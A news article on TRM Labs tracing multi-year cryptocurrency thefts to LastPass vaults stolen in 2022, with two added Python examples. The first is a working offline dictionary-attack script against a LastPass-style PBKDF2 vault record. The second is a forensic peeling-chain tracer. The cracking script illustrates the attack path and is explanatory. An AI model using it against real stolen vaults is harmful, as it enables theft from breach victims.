TRM Labs Finds LastPass 2022 Breach Led to Years-Long Cryptocurrency Thefts

Encrypted vault backups stolen during the 2022 LastPass incident are still being successfully attacked, with threat actors leveraging weak master passwords to decrypt vaults and empty cryptocurrency accounts as late as the end of 2025, according to new analysis from TRM Labs.

The blockchain intelligence firm said on-chain evidence indicates participation by Russian cybercriminal groups, noting that one Russian exchange continued to receive funds tied to compromised LastPass vaults as recently as October.

This conclusion is “based on the totality of on-chain evidence – including repeated interaction with Russia-associated infrastructure, continuity of control across pre- and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps,” it added.

LastPass suffered a major compromise in 2022 that allowed intruders to obtain customer personal data and encrypted password vaults, including vaults holding credentials such as cryptocurrency private keys and seed phrases.


Earlier this month, the password manager was fined by the U.K. Information Commissioner’s Office (ICO) for failing to deploy adequate technical and security controls to prevent the breach.

The original breach notification also flagged the risk that adversaries could use offline brute-force attacks to guess master passwords and decrypt stolen vaults. TRM Labs’ latest work shows that this attack path is actively being used.

“Any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time,” the company said.

“As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later – leading to wallet drains as recently as late 2025.”
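The attack path described above is an offline dictionary attack: because the attacker holds the encrypted vault, every guess can be tested locally with no rate limit and no lockout, and the only costs are the key-derivation work per guess and the size of the password space. The script below is an added example (not code from LastPass or TRM Labs) that shows the shape of such an attack on a LastPass-style record. It assumes the vault key is PBKDF2-HMAC-SHA256 over the master password salted with the lower-cased account email, and it uses one extra PBKDF2 round of that key as a stand-in check value; a real attacker would instead test each candidate key by decrypting a vault item. The email addresses, passwords, iteration counts and wordlist are constructed.

```python
"""Offline dictionary attack against a LastPass-style vault record (added example).

Assumptions (not taken from the article):
 - vault key = PBKDF2-HMAC-SHA256(master_password, salt=lower(email), iterations, 32 bytes)
 - stored check value = PBKDF2-HMAC-SHA256(vault_key, salt=master_password, 1 round)
 - all records, passwords and the wordlist are constructed sample data
"""
import hashlib
import hmac
from typing import Optional, Tuple


def derive_vault_key(master_password: str, email: str, iterations: int) -> bytes:
    """Derive the 256-bit vault key; the email is normalised before use as salt."""
    return hashlib.pbkdf2_hmac(
        "sha256",
        master_password.encode("utf-8"),
        email.strip().lower().encode("utf-8"),
        iterations,
        dklen=32,
    )


def make_verifier(master_password: str, email: str, iterations: int) -> bytes:
    """Check value an attacker compares candidates against (assumed construction)."""
    key = derive_vault_key(master_password, email, iterations)
    return hashlib.pbkdf2_hmac("sha256", key, master_password.encode("utf-8"), 1, dklen=32)


def make_vault_record(email: str, master_password: str, iterations: int) -> dict:
    """What the attacker holds after the theft: email, iteration count, check value."""
    return {
        "email": email,
        "iterations": iterations,
        "verifier": make_verifier(master_password, email, iterations).hex(),
    }


def crack_vault(record: dict, wordlist) -> Tuple[Optional[str], int]:
    """Try every wordlist entry offline. Returns (password or None, guesses made).

    Nothing here talks to a server, so no lockout or alerting applies; the
    per-guess cost is set entirely by the record's iteration count.
    """
    target = bytes.fromhex(record["verifier"])
    for n, guess in enumerate(wordlist, start=1):
        candidate = make_verifier(guess, record["email"], record["iterations"])
        if hmac.compare_digest(candidate, target):
            return guess, n
    return None, len(wordlist)


# Constructed sample data. The weak vault keeps a low, legacy-era iteration
# count and a guessable password; the other uses a higher count and a
# passphrase that is not in the wordlist, so the attack exhausts the list.
WORDLIST = ["password", "123456", "Summer2022!", "letmein", "qwerty"]
WEAK_VAULT = make_vault_record("alice@example.com", "Summer2022!", 5_000)
STRONG_VAULT = make_vault_record("bob@example.com", "correct-horse-battery-staple-4711", 100_100)


if __name__ == "__main__":
    for name, rec in (("weak", WEAK_VAULT), ("strong", STRONG_VAULT)):
        pw, tried = crack_vault(rec, WORDLIST)
        status = f"cracked {pw!r}" if pw else "not cracked"
        print(f"{name} vault ({rec['iterations']} iterations): {status} after {tried} guesses")
```

The two knobs the defender controlled before the theft are visible in the record: the iteration count multiplies the cost of every guess, and the master password's entropy multiplies the number of guesses. Rotating the master password after the breach does nothing for a copy of the vault that was already taken; only rotating the secrets stored inside it (keys, seed phrases, account passwords) removes the value of a later crack.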

The links between the 2022 LastPass vault theft and Russian actors are based on two main elements: the consistent use of exchanges long associated with the Russian cybercrime ecosystem in the laundering chain, and operational correlations identified from wallets interacting with mixers both before and after the mixing and laundering stages.

More than $35 million in stolen digital assets has been traced, with $28 million converted to Bitcoin and laundered via Wasabi Wallet between late 2024 and early 2025. A further $7 million is tied to a second wave observed in September 2025.

The diverted funds were funneled through Cryptomixer.io and then off-ramped via Cryptex and Audia6, two Russian exchanges linked to illicit activity. Notably, Cryptex was sanctioned by the U.S. Treasury Department in September 2024 for handling more than $51.2 million in ransomware-derived proceeds.


TRM Labs said it was able to unravel the mixing flow despite the use of CoinJoin techniques intended to obscure fund movement, identifying clusters of withdrawals and peeling chains that directed mixed Bitcoin into the two exchanges.
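A peeling chain is a sequence of transactions in which each one spends the large "change" output of the previous one and peels a small amount off to a new destination, so a single post-mix balance is paid out to exchange deposit addresses a slice at a time. The script below is an added example (not TRM Labs' tooling) of the walk an analyst performs: starting from one withdrawal output, follow the change output hop by hop while the transaction still looks like a peel, collect the peeled outputs, and total them by the label attached to the destination address. The transaction graph, address names and exchange labels are constructed; the detection heuristic (one input, two outputs, change at least 60% of the input value) is this example's own simplification.

```python
"""Walk a peeling chain over a constructed Bitcoin-style transaction graph (added example).

Graph model (constructed, not real chain data): txs[txid] = {"in": [(prev_txid, vout), ...],
"out": [(address, sats), ...]}. Values are integer satoshis to avoid float drift.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

Outpoint = Tuple[str, int]

# Constructed sample graph: tx0 stands in for a mixer withdrawal; tx1..tx3 each
# peel a small amount to an exchange deposit address and pass the rest on;
# tx4 splits the remainder evenly, so the chain walk stops there.
SAMPLE_TXS: Dict[str, dict] = {
    "tx0": {"in": [], "out": [("chain_a1", 1_000_000_000)]},
    "tx1": {"in": [("tx0", 0)], "out": [("dep_exchA_1", 80_000_000), ("chain_a2", 919_000_000)]},
    "tx2": {"in": [("tx1", 1)], "out": [("chain_a3", 820_000_000), ("dep_exchB_1", 98_000_000)]},
    "tx3": {"in": [("tx2", 0)], "out": [("dep_exchA_2", 110_000_000), ("chain_a4", 709_000_000)]},
    "tx4": {"in": [("tx3", 1)], "out": [("split_x", 350_000_000), ("split_y", 358_000_000)]},
}

# Hypothetical attribution labels for deposit addresses (constructed).
SAMPLE_LABELS = {"dep_exchA_1": "ExchangeA", "dep_exchA_2": "ExchangeA", "dep_exchB_1": "ExchangeB"}


def build_spend_index(txs: Dict[str, dict]) -> Dict[Outpoint, str]:
    """Map every spent outpoint (txid, vout) to the txid that spends it."""
    index: Dict[Outpoint, str] = {}
    for txid, tx in txs.items():
        for prev in tx["in"]:
            index[prev] = txid
    return index


def follow_peeling_chain(txs: Dict[str, dict], start: Outpoint,
                         min_change_ratio: float = 0.6, max_hops: int = 10_000) -> List[dict]:
    """Follow change outputs from `start` while each spend looks like a peel.

    A hop counts as a peel when the spending tx has exactly one input and two
    outputs and the larger output keeps at least `min_change_ratio` of the input
    value; the smaller output is the peeled amount. Returns one record per hop.
    """
    spends = build_spend_index(txs)
    peels: List[dict] = []
    utxo = start
    for _ in range(max_hops):
        txid = spends.get(utxo)
        if txid is None:  # unspent: chain ends here
            break
        tx = txs[txid]
        if len(tx["in"]) != 1 or len(tx["out"]) != 2:
            break
        prev_txid, vout = tx["in"][0]
        in_value = txs[prev_txid]["out"][vout][1]
        change_vout = 0 if tx["out"][0][1] >= tx["out"][1][1] else 1
        change_addr, change_val = tx["out"][change_vout]
        peel_addr, peel_val = tx["out"][1 - change_vout]
        if change_val < min_change_ratio * in_value:  # roughly even split: not a peel
            break
        peels.append({"txid": txid, "peel_addr": peel_addr, "peel_sats": peel_val,
                      "change_addr": change_addr, "change_sats": change_val})
        utxo = (txid, change_vout)
    return peels


def offramp_totals(peels: List[dict], labels: Dict[str, str]) -> Dict[str, int]:
    """Sum peeled satoshis by the label of the receiving address."""
    totals: Dict[str, int] = defaultdict(int)
    for p in peels:
        totals[labels.get(p["peel_addr"], "unlabelled")] += p["peel_sats"]
    return dict(totals)


if __name__ == "__main__":
    chain = follow_peeling_chain(SAMPLE_TXS, ("tx0", 0))
    for p in chain:
        print(f"{p['txid']}: peeled {p['peel_sats'] / 1e8:.2f} BTC to {p['peel_addr']}")
    for label, sats in offramp_totals(chain, SAMPLE_LABELS).items():
        print(f"{label}: {sats / 1e8:.2f} BTC")
```

On real data the walk is the same but the stopping rules matter more: output order is not a reliable change indicator, a CoinJoin round has many inputs and outputs and is never itself a peel hop, and address labels come from the investigator's own clustering and exchange attribution rather than from the chain.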

“This is a clear example of how a single breach can evolve into a multi-year theft campaign,” said Ari Redbord, global head of policy at TRM Labs. “Even when mixers are used, operational patterns, infrastructure reuse, and off-ramp behavior can still reveal who’s really behind the activity.”

“Russian high-risk exchanges continue to serve as critical off-ramps for global cybercrime. This case shows why demixing and ecosystem-level analysis are now essential tools for attribution and enforcement.”



All Rights Reserved by Jutsu Inc. | 2024